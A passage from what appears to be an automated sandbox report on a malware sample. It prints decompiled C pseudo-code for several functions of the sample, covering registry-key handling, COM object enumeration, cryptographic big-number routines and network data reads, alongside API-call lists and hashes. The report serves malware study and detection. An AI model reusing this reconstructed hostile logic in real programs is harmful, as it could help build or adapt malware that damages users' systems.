                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Heap$Allocate$ComputerFreeHandleName$CloseCriticalInitializeModuleSectionmemset
                                • String ID:
                                • API String ID: 705796739-0
                                • Opcode ID: 296855697d0cac36c022b2ebcb5d0ea695748809c03a81b008f73ab22a3be9b0
                                • Instruction ID: ad7448ac5dcb5fff5f9183cf2ebcc3e0155e4d9fd036d0ef82c378a1a99f65ee
                                • Opcode Fuzzy Hash: 296855697d0cac36c022b2ebcb5d0ea695748809c03a81b008f73ab22a3be9b0
                                • Instruction Fuzzy Hash: 2051B572A40215BBEF16DB66D9C4A6E77FAEF04794F150055E804F7240EB78FD848BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 79%
                                			E04191D57(void* __ecx, intOrPtr _a8, char _a16, intOrPtr* _a20, char _a24) {
                                				signed int _v8;
                                				char _v12;
                                				signed int* _v16;
                                				char _v284;
                                				void* __esi;
                                				intOrPtr _t59;
                                				intOrPtr* _t60;
                                				intOrPtr _t64;
                                				char _t65;
                                				intOrPtr _t68;
                                				intOrPtr _t69;
                                				intOrPtr _t71;
                                				void* _t73;
                                				signed int _t81;
                                				void* _t91;
                                				void* _t92;
                                				char _t98;
                                				signed int* _t100;
                                				intOrPtr* _t101;
                                				void* _t102;
                                
                                				_t92 = __ecx;
                                				_v8 = _v8 & 0x00000000;
                                				_t98 = _a16;
                                				if(_t98 == 0) {
                                					__imp__( &_v284,  *0x419a38c);
                                					_t91 = 0x80000002;
                                					L6:
                                					_t59 = E04194AA6( &_v284,  &_v284);
                                					_a8 = _t59;
                                					if(_t59 == 0) {
                                						_v8 = 8;
                                						L29:
                                						_t60 = _a20;
                                						if(_t60 != 0) {
                                							 *_t60 =  *_t60 + 1;
                                						}
                                						return _v8;
                                					}
                                					_t101 = _a24;
                                					if(E04197702(_t92, _t97, _t101, _t91, _t59) != 0) {
                                						L27:
                                						E041950CA(_a8);
                                						goto L29;
                                					}
                                					_t64 =  *0x419a2cc; // 0x0
                                					_t65 = E04194AA6(_t64,  *((intOrPtr*)(_t64 + 0xc)));
                                					_a24 = _t65;
                                					if(_t65 == 0) {
                                						L14:
                                						_t29 = _t101 + 0x14; // 0x102
                                						_t33 = _t101 + 0x10; // 0x3d041990
                                						if(E04195F2A(_t97,  *_t33, _t91, _a8,  *0x419a384,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                							_t68 =  *0x419a2d4; // 0x0
                                							if(_t98 == 0) {
                                								_t35 = _t68 + 0x419b9e0; // 0x702e7eb2
                                								_t69 = _t35;
                                							} else {
                                								_t34 = _t68 + 0x419b9db; // 0x45464f23
                                								_t69 = _t34;
                                							}
                                							if(E04195927(_t69,  *0x419a384,  *0x419a388,  &_a24,  &_a16) == 0) {
                                								if(_t98 == 0) {
                                									_t71 =  *0x419a2d4; // 0x0
                                									_t44 = _t71 + 0x419b86a; // 0xa453651
                                									_t73 = E04194AA6(_t44, _t44);
                                									_t99 = _t73;
                                									if(_t73 == 0) {
                                										_v8 = 8;
                                									} else {
                                										_t47 = _t101 + 0x10; // 0x3d041990
                                										E04191F7A( *_t47, _t91, _a8,  *0x419a388, _a24);
                                										_t49 = _t101 + 0x10; // 0x3d041990
                                										E04191F7A( *_t49, _t91, _t99,  *0x419a380, _a16);
                                										E041950CA(_t99);
                                									}
                                								} else {
                                									_t40 = _t101 + 0x10; // 0x3d041990
                                									E04191F7A( *_t40, _t91, _a8,  *0x419a388, _a24);
                                									_t43 = _t101 + 0x10; // 0x3d041990
                                									E04191F7A( *_t43, _t91, _a8,  *0x419a380, _a16);
                                								}
                                								if( *_t101 != 0) {
                                									E041950CA(_a24);
                                								} else {
                                									 *_t101 = _a16;
                                								}
                                							}
                                						}
                                						goto L27;
                                					}
                                					_t21 = _t101 + 0x10; // 0x3d041990
                                					_t81 = E04196A36( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                					if(_t81 == 0) {
                                						_t100 = _v16;
                                						if(_v12 == 0x28) {
                                							 *_t100 =  *_t100 & _t81;
                                							_t26 = _t101 + 0x10; // 0x3d041990
                                							E04195F2A(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                						}
                                						E041950CA(_t100);
                                						_t98 = _a16;
                                					}
                                					E041950CA(_a24);
                                					goto L14;
                                				}
                                				if(_t98 <= 8 || _t98 + 0x2a >= 0x104) {
                                					goto L29;
                                				} else {
                                					_push(0x5f);
                                					_push(_a8);
                                					if( *0x419a110() != 0) {
                                						goto L29;
                                					} else {
                                						_t97 = _a8;
                                						E041977A4(_t98, _a8,  &_v284);
                                						__imp__(_t102 + _t98 - 0x117,  *0x419a38c);
                                						 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                						_t91 = 0x80000003;
                                						goto L6;
                                					}
                                				}
                                			}

                                APIs
                                • lstrcpy.KERNEL32(?,?), ref: 04191DB7
                                  • Part of subcall function 04194AA6: lstrlen.KERNEL32(?,00000000,00000000,04197909,041913D0,?,041955DE,041955DE,?,041955DE,?,00000000,E8FA7DD7,00000000), ref: 04194AAD
                                  • Part of subcall function 04194AA6: mbstowcs.NTDLL ref: 04194AD6
                                  • Part of subcall function 04194AA6: memset.NTDLL ref: 04194AE8
                                  • Part of subcall function 04191F7A: lstrlenW.KERNEL32(?,?,?,04191F20,3D041990,80000002,041930C2,04194106,0A453651,702E7EB2,04194106,?,3D041990,80000002,041930C2,?), ref: 04191F9F
                                  • Part of subcall function 041950CA: HeapFree.KERNEL32(00000000,00000000,04194239,00000000,00000001,?,00000000,?,?,?,04196B8D,00000000,?,00000001), ref: 041950D6
                                • lstrcpy.KERNEL32(?,00000000), ref: 04191DD9
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                • String ID: ($\
                                • API String ID: 3924217599-1512714803
                                • Opcode ID: ff7b7b74e962a47377ad66a853248ceca0c1910f23acafd90330157b14a1c4c3
                                • Instruction ID: a4c85a15388bcdb6b11f6680daac86fb12d57471141d5cb3073f1b82bda6002f
                                • Opcode Fuzzy Hash: ff7b7b74e962a47377ad66a853248ceca0c1910f23acafd90330157b14a1c4c3
                                • Instruction Fuzzy Hash: D151497260020EBFEF229FA5DD80EAA37FAFF04354F108554F91592160DB35EEA99B10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(00000000), ref: 0419165B
                                • SysFreeString.OLEAUT32(00000000), ref: 0419173E
                                  • Part of subcall function 04196C6D: SysAllocString.OLEAUT32(041992B0), ref: 04196CBD
                                • SafeArrayDestroy.OLEAUT32(?), ref: 04191792
                                • SysFreeString.OLEAUT32(?), ref: 041917A0
                                  • Part of subcall function 04191FC2: Sleep.KERNEL32(000001F4), ref: 0419200A
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$AllocFree$ArrayDestroySafeSleep
                                • String ID:
                                • API String ID: 3193056040-0
                                • Opcode ID: 3f70bbd5bb697d2dbd793b51536d82b508b8d708fce58d4a2dc163d351487e9b
                                • Instruction ID: ad00eaad4e7caa40c5cb9d508813a7fa8aaa01883d93fcb72b8609df75a2a17b
                                • Opcode Fuzzy Hash: 3f70bbd5bb697d2dbd793b51536d82b508b8d708fce58d4a2dc163d351487e9b
                                • Instruction Fuzzy Hash: 4C510D76A0024ABFDF04DFE8C8C48AEB7F6FF88344B158869E5159B210DB35AD85CB51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 46%
                                			E04196C6D(intOrPtr* __eax) {
                                				void* _v8;
                                				WCHAR* _v12;
                                				void* _v16;
                                				char _v20;
                                				void* _v24;
                                				intOrPtr _v28;
                                				void* _v32;
                                				intOrPtr _v40;
                                				short _v48;
                                				intOrPtr _v56;
                                				short _v64;
                                				intOrPtr* _t54;
                                				intOrPtr* _t56;
                                				intOrPtr _t57;
                                				intOrPtr* _t58;
                                				intOrPtr* _t60;
                                				void* _t61;
                                				intOrPtr* _t63;
                                				intOrPtr* _t65;
                                				intOrPtr* _t67;
                                				intOrPtr* _t69;
                                				intOrPtr* _t71;
                                				intOrPtr* _t74;
                                				intOrPtr* _t76;
                                				intOrPtr _t78;
                                				intOrPtr* _t82;
                                				intOrPtr* _t86;
                                				intOrPtr _t102;
                                				intOrPtr _t108;
                                				void* _t117;
                                				void* _t121;
                                				void* _t122;
                                				intOrPtr _t129;
                                
                                				_t122 = _t121 - 0x3c;
                                				_push( &_v8);
                                				_push(__eax);
                                				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                				if(_t117 >= 0) {
                                					_t54 = _v8;
                                					_t102 =  *0x419a2d4; // 0x0
                                					_t5 = _t102 + 0x419b038; // 0xbc5b15aa
                                					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                					_t56 = _v8;
                                					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                					if(_t117 >= 0) {
                                						__imp__#2(0x41992b0);
                                						_v28 = _t57;
                                						if(_t57 == 0) {
                                							_t117 = 0x8007000e;
                                						} else {
                                							_t60 = _v32;
                                							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                							_t86 = __imp__#6;
                                							_t117 = _t61;
                                							if(_t117 >= 0) {
                                								_t63 = _v24;
                                								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                								if(_t117 >= 0) {
                                									_t129 = _v20;
                                									if(_t129 != 0) {
                                										_v64 = 3;
                                										_v48 = 3;
                                										_v56 = 0;
                                										_v40 = 0;
                                										if(_t129 > 0) {
                                											while(1) {
                                												_t67 = _v24;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t122 = _t122;
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												asm("movsd");
                                												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                												if(_t117 < 0) {
                                													goto L16;
                                												}
                                												_t69 = _v8;
                                												_t108 =  *0x419a2d4; // 0x0
                                												_t28 = _t108 + 0x419b0bc; // 0x766ff270
                                												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                												if(_t117 >= 0) {
                                													_t74 = _v16;
                                													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                													if(_t117 >= 0 && _v12 != 0) {
                                														_t78 =  *0x419a2d4; // 0x0
                                														_t33 = _t78 + 0x419b078; // 0xe2c46ab8
                                														if(lstrcmpW(_v12, _t33) == 0) {
                                															_t82 = _v16;
                                															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                														}
                                														 *_t86(_v12);
                                													}
                                													_t76 = _v16;
                                													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                												}
                                												_t71 = _v8;
                                												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                												_v40 = _v40 + 1;
                                												if(_v40 < _v20) {
                                													continue;
                                												}
                                												goto L16;
                                											}
                                										}
                                									}
                                								}
                                								L16:
                                								_t65 = _v24;
                                								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                							}
                                							 *_t86(_v28);
                                						}
                                						_t58 = _v32;
                                						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                					}
                                				}
                                				return _t117;
                                			}


                                APIs
                                • SysAllocString.OLEAUT32(041992B0), ref: 04196CBD
                                • lstrcmpW.KERNEL32(00000000,E2C46AB8), ref: 04196D9F
                                • SysFreeString.OLEAUT32(00000000), ref: 04196DB8
                                • SysFreeString.OLEAUT32(?), ref: 04196DE7
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$Free$Alloclstrcmp
                                • String ID:
                                • API String ID: 1885612795-0
                                • Opcode ID: 1cb6bc19ca711ea71ce3bc60cd2dadba0267cdc5f64087624e335154387e28d0
                                • Instruction ID: 97137f193bb3882c4d923aa15c98910ddd5614f82b1f7ed2c8ef59d9606c48d8
                                • Opcode Fuzzy Hash: 1cb6bc19ca711ea71ce3bc60cd2dadba0267cdc5f64087624e335154387e28d0
                                • Instruction Fuzzy Hash: D6512D75D00519EFCF01DFA8C8888AEB7F9FF89704B188598E915AB314DB75AD41CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 85%
                                			E04195D93(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				signed int _v16;
                                				void _v156;
                                				void _v428;
                                				void* _t55;
                                				unsigned int _t56;
                                				signed int _t66;
                                				signed int _t74;
                                				void* _t76;
                                				signed int _t79;
                                				void* _t81;
                                				void* _t92;
                                				void* _t96;
                                				signed int* _t99;
                                				signed int _t101;
                                				signed int _t103;
                                				void* _t107;
                                
                                				_t92 = _a12;
                                				_t101 = __eax;
                                				_t55 = E041928F1(_a16, _t92);
                                				_t79 = _t55;
                                				if(_t79 == 0) {
                                					L18:
                                					return _t55;
                                				}
                                				_t56 =  *(_t92 + _t79 * 4 - 4);
                                				_t81 = 0;
                                				_t96 = 0x20;
                                				if(_t56 == 0) {
                                					L4:
                                					_t97 = _t96 - _t81;
                                					_v12 = _t96 - _t81;
                                					E04191000(_t79,  &_v428);
                                					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E04193915(_t101,  &_v428, _a8, _t96 - _t81);
                                					E04193915(_t79,  &_v156, _a12, _t97);
                                					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                					_t66 = E04191000(_t101, 0x419a188);
                                					_t103 = _t101 - _t79;
                                					_a8 = _t103;
                                					if(_t103 < 0) {
                                						L17:
                                						E04191000(_a16, _a4);
                                						E04193B6F(_t79,  &_v428, _a4, _t97);
                                						memset( &_v428, 0, 0x10c);
                                						_t55 = memset( &_v156, 0, 0x84);
                                						goto L18;
                                					}
                                					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                					do {
                                						if(_v8 != 0xffffffff) {
                                							_push(1);
                                							_push(0);
                                							_push(0);
                                							_push( *_t99);
                                							L04197D8C();
                                							_t74 = _t66 +  *(_t99 - 4);
                                							asm("adc edx, esi");
                                							_push(0);
                                							_push(_v8 + 1);
                                							_push(_t92);
                                							_push(_t74);
                                							L04197D86();
                                							if(_t92 > 0 || _t74 > 0xffffffff) {
                                								_t74 = _t74 | 0xffffffff;
                                								_v16 = _v16 & 0x00000000;
                                							}
                                						} else {
                                							_t74 =  *_t99;
                                						}
                                						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                						_a12 = _t74;
                                						_t76 = E0419679F(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                						while(1) {
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							L13:
                                							_t92 =  &_v156;
                                							if(E04195AC5(_t79, _t92, _t106) < 0) {
                                								break;
                                							}
                                							L14:
                                							_a12 = _a12 + 1;
                                							_t76 = E04194A54(_t79,  &_v156, _t106, _t106);
                                							 *_t99 =  *_t99 - _t76;
                                							if( *_t99 != 0) {
                                								goto L14;
                                							}
                                							goto L13;
                                						}
                                						_a8 = _a8 - 1;
                                						_t66 = _a12;
                                						_t99 = _t99 - 4;
                                						 *(0x419a188 + _a8 * 4) = _t66;
                                					} while (_a8 >= 0);
                                					_t97 = _v12;
                                					goto L17;
                                				}
                                				while(_t81 < _t96) {
                                					_t81 = _t81 + 1;
                                					_t56 = _t56 >> 1;
                                					if(_t56 != 0) {
                                						continue;
                                					}
                                					goto L4;
                                				}
                                				goto L4;
                                			}


                                APIs
                                • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04195E46
                                • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04195E5C
                                • memset.NTDLL ref: 04195F05
                                • memset.NTDLL ref: 04195F1B
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: memset$_allmul_aulldiv
                                • String ID:
                                • API String ID: 3041852380-0
                                • Opcode ID: b363451eb55acbacd57242cb03149718b541e8661933a1dfce6b4ed5224fbe82
                                • Instruction ID: 1c2a8c7b3b8716934cd14f863a3ce9a90d49db51767cfc0b38dfe2233be35bad
                                • Opcode Fuzzy Hash: b363451eb55acbacd57242cb03149718b541e8661933a1dfce6b4ed5224fbe82
                                • Instruction Fuzzy Hash: 0B419032B00219BBEF119E68CC80BEE77E5AF45354F104569F919A7180DB71BE548B91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 57%
                                			E041914A8(void* __eax) {
                                				long _v8;
                                				char _v12;
                                				char _v16;
                                				intOrPtr _v20;
                                				void* _v24;
                                				void* __esi;
                                				void* _t41;
                                				char* _t42;
                                				long _t43;
                                				intOrPtr _t47;
                                				intOrPtr* _t48;
                                				char _t50;
                                				char* _t55;
                                				long _t56;
                                				intOrPtr* _t57;
                                				void* _t60;
                                				void* _t61;
                                				void* _t68;
                                				void* _t72;
                                				void* _t73;
                                				void* _t74;
                                				void* _t78;
                                
                                				_t72 = __eax;
                                				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                					L2:
                                					_t41 = _t72;
                                					_pop(_t73);
                                					_t74 = _t41;
                                					_t42 =  &_v12;
                                					_v8 = 0;
                                					_v16 = 0;
                                					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
                                					if(_t42 == 0) {
                                						_t43 = GetLastError();
                                						_v8 = _t43;
                                						if(_t43 == 0x2efe) {
                                							_v8 = 0;
                                							goto L29;
                                						}
                                					} else {
                                						if(_v12 == 0) {
                                							L29:
                                							 *((intOrPtr*)(_t74 + 0x30)) = 0;
                                						} else {
                                							_push( &_v24);
                                							_push(1);
                                							_push(0);
                                							if( *0x419a144() != 0) {
                                								_v8 = 8;
                                							} else {
                                								_t47 = E04196837(0x1000);
                                								_v20 = _t47;
                                								if(_t47 == 0) {
                                									_v8 = 8;
                                								} else {
                                									goto L8;
                                									do {
                                										while(1) {
                                											L8:
                                											_t50 = _v12;
                                											if(_t50 >= 0x1000) {
                                												_t50 = 0x1000;
                                											}
                                											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
                                											if(_t50 == 0) {
                                												break;
                                											}
                                											_t57 = _v24;
                                											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
                                											_t18 =  &_v12;
                                											 *_t18 = _v12 - _v16;
                                											if( *_t18 != 0) {
                                												continue;
                                											} else {
                                											}
                                											L14:
                                											if(WaitForSingleObject( *0x419a2c4, 0) != 0x102) {
                                												_v8 = 0x102;
                                											} else {
                                												_t55 =  &_v12;
                                												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
                                												if(_t55 != 0) {
                                													goto L19;
                                												} else {
                                													_t56 = GetLastError();
                                													_v8 = _t56;
                                													if(_t56 == 0x2f78 && _v12 == 0) {
                                														_v8 = 0;
                                														goto L19;
                                													}
                                												}
                                											}
                                											L22:
                                											E041950CA(_v20);
                                											if(_v8 == 0) {
                                												_v8 = E041937FC(_v24, _t74);
                                											}
                                											goto L25;
                                										}
                                										_v8 = GetLastError();
                                										goto L14;
                                										L19:
                                									} while (_v12 != 0);
                                									goto L22;
                                								}
                                								L25:
                                								_t48 = _v24;
                                								 *((intOrPtr*)( *_t48 + 8))(_t48);
                                							}
                                						}
                                					}
                                					return _v8;
                                				} else {
                                					_t60 = E041925C7(__eax);
                                					if(_t60 != 0) {
                                						return _t60;
                                					} else {
                                						goto L2;
                                					}
                                				}
                                			}


























                                APIs
                                • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,04197134,00000000,?), ref: 04195B9B
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,04197134,00000000,?,?), ref: 04195BBB
                                  • Part of subcall function 041925C7: wcstombs.NTDLL ref: 04192687
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: ErrorLastObjectSingleWaitwcstombs
                                • String ID:
                                • API String ID: 2344289193-0
                                • Opcode ID: 879920a430424f3202c92fad325bd0f27b1482c0c04f2f6d907e9dc6bd18b3ab
                                • Instruction ID: 398b5a79ed7d5d18f46ef4f88d2c93f4ef60ac687702ad62f5f71bfcebd3f4b6
                                • Opcode Fuzzy Hash: 879920a430424f3202c92fad325bd0f27b1482c0c04f2f6d907e9dc6bd18b3ab
                                • Instruction Fuzzy Hash: 73411AB2A00209FFDF119FA5D9C49AEB7FAFB04344F1444A9E412F7250E734AE849B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 04195C8C
                                • SysAllocString.OLEAUT32(04191E05), ref: 04195CCF
                                • SysFreeString.OLEAUT32(00000000), ref: 04195CE3
                                • SysFreeString.OLEAUT32(00000000), ref: 04195CF1
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: 9f58d10403d8ced14164755198fd83afeee7914153d9c524de6a78667fe88601
                                • Instruction ID: 8d589344ca98753d5c2d4a5f29d2ec64610323102623f2c2cca3a046350bbb96
                                • Opcode Fuzzy Hash: 9f58d10403d8ced14164755198fd83afeee7914153d9c524de6a78667fe88601
                                • Instruction Fuzzy Hash: 3831E772900209FFCB06DF99D4C48AE7BF9FF48340B20846EE905A7210D735AA85DBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			E041973C3(signed int _a4, signed int* _a8) {
                                				void* __ecx;
                                				void* __edi;
                                				signed int _t6;
                                				intOrPtr _t8;
                                				intOrPtr _t12;
                                				void* _t25;
                                				void* _t26;
                                				signed int* _t27;
                                				signed short* _t28;
                                				CHAR* _t30;
                                				long _t31;
                                				intOrPtr* _t32;
                                
                                				_t6 =  *0x419a2c8; // 0x0
                                				_t32 = _a4;
                                				_a4 = _t6 ^ 0xd05b5869;
                                				_t8 =  *0x419a2d4; // 0x0
                                				_t3 = _t8 + 0x419b8a2; // 0x2b8b8603
                                				_t25 = 0;
                                				_t30 = E04192DEA(_t3, 1);
                                				if(_t30 != 0) {
                                					_t25 = CreateEventA(0x419a2f8, 1, 0, _t30);
                                					E041950CA(_t30);
                                				}
                                				_t12 =  *0x419a2b4; // 0x42ee000a
                                				if(_t12 != 6 || _t12 < 2) {
                                					if( *_t32 != 0 && E0419513E() == 0) {
                                						_t28 =  *0x419a120( *_t32, 0x20);
                                						if(_t28 != 0) {
                                							 *_t28 =  *_t28 & 0x00000000;
                                							_t28 =  &(_t28[1]);
                                						}
                                						_t31 = E04196BE1(0, _t28,  *_t32, 0);
                                						if(_t31 == 0) {
                                							if(_t25 == 0) {
                                								goto L21;
                                							}
                                							_t31 = WaitForSingleObject(_t25, 0x4e20);
                                							if(_t31 == 0) {
                                								goto L19;
                                							}
                                						}
                                					}
                                					goto L11;
                                				} else {
                                					L11:
                                					_t27 = _a8;
                                					if(_t27 != 0) {
                                						 *_t27 =  *_t27 | 0x00000001;
                                					}
                                					_t31 = E041951A8(_t32, _t26);
                                					if(_t31 == 0 && _t25 != 0) {
                                						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                					}
                                					if(_t27 != 0 && _t31 != 0) {
                                						 *_t27 =  *_t27 & 0xfffffffe;
                                					}
                                					L19:
                                					if(_t25 != 0) {
                                						CloseHandle(_t25);
                                					}
                                					L21:
                                					return _t31;
                                				}
                                			}
















                                APIs
                                  • Part of subcall function 04192DEA: lstrlen.KERNEL32(E8FA7DD7,00000000,00000000,00000027,00000000,00000000,04197909,041955DE,?,00000000,E8FA7DD7,00000000,?,?,?,041955DE), ref: 04192E20
                                  • Part of subcall function 04192DEA: lstrcpy.KERNEL32(00000000,00000000), ref: 04192E44
                                  • Part of subcall function 04192DEA: lstrcat.KERNEL32(00000000,00000000), ref: 04192E4C
                                • CreateEventA.KERNEL32(0419A2F8,00000001,00000000,00000000,2B8B8603,00000001,00000000,?,?,00000000,?,041930E1,?,?,?), ref: 04197402
                                  • Part of subcall function 041950CA: HeapFree.KERNEL32(00000000,00000000,04194239,00000000,00000001,?,00000000,?,?,?,04196B8D,00000000,?,00000001), ref: 041950D6
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,041930E1,00000000,?,00000000,?,041930E1,?,?,?,?,?,?,?,0419211B), ref: 04197460
                                • WaitForSingleObject.KERNEL32(00000000,00004E20,2B8B8603,00000001,00000000,?,?,00000000,?,041930E1,?,?,?), ref: 0419748E
                                • CloseHandle.KERNEL32(00000000,2B8B8603,00000001,00000000,?,?,00000000,?,041930E1,?,?,?), ref: 041974A6
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp
                                Similarity
                                • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                • String ID:
                                • API String ID: 73268831-0
                                • Opcode ID: 5313c4625e3427cfdc57ee9e0825ed627789c9c1d8749b044e0729c8dd4d0b30
                                • Instruction ID: ef46c24b45a40d7336afc1325f35111a14c244476c9b82272191042616452f6e
                                • Opcode Fuzzy Hash: 5313c4625e3427cfdc57ee9e0825ed627789c9c1d8749b044e0729c8dd4d0b30
                                • Instruction Fuzzy Hash: 5721E432620312EBDF216E69DCC4B577BE9EF48B54F050664FD21AB282DB75FC408680
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 39%
                                			E04193032(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                				intOrPtr _v12;
                                				void* _v16;
                                				void* _v28;
                                				char _v32;
                                				void* __esi;
                                				void* _t29;
                                				void* _t38;
                                				signed int* _t39;
                                				void* _t40;
                                
                                				_t36 = __ecx;
                                				_v32 = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				asm("stosd");
                                				_v12 = _a4;
                                				_t38 = E04196710(__ecx,  &_v32);
                                				if(_t38 != 0) {
                                					L12:
                                					_t39 = _a8;
                                					L13:
                                					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
                                						_t23 =  &(_t39[1]);
                                						if(_t39[1] != 0) {
                                							E041915B9(_t23);
                                						}
                                					}
                                					return _t38;
                                				}
                                				if(E04194C8C(0x40,  &_v16) != 0) {
                                					_v16 = 0;
                                				}
                                				_t40 = CreateEventA(0x419a2f8, 1, 0,  *0x419a394);
                                				if(_t40 != 0) {
                                					SetEvent(_t40);
                                					Sleep(0xbb8);
                                					CloseHandle(_t40);
                                				}
                                				_push( &_v32);
                                				if(_a12 == 0) {
